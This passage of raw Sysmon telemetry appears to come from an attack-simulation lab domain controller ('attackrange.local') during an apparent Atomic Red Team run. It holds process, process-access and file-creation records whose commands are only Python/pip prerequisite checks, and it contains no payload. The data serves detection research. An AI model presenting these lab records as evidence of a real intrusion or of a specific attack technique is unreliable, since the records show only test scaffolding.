4\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.128{4DB9351A-A32D-60D3-4306-00000000CF01}6100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "py -3 -m pip --version >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.108{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025201Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.086{4DB9351A-A32D-60D3-4206-00000000CF01}6576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "echo "PIP must be installed manually"" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025200Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 23542300x800000000000000025199Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025198Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3F4AEA5E4A3513648AE4E194BFD6E6D,SHA256=FF415477EBFC6E77A82301194670198A8623699B52BA2D3D581CF943E1FA9286,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025197Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025196Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.077{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txtMD5=39D3FD75AD0201BE7A221BC36B953867,SHA256=BE852674F1F7EF6D10A8446FD8F28403464C07ACA037668AD5A1E7697B4ABDB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025195Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025194Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025193Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025192Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025191Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025190Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025189Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025188Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.045{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025187Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.048{4DB9351A-A32D-60D3-4106-00000000CF01}1684C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "py -3 -m pip --version >nul 2>&1 && exit /b %%errorlevel%%" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025186Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.014{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32D-60D3-4006-00000000CF01}1920C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025185Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 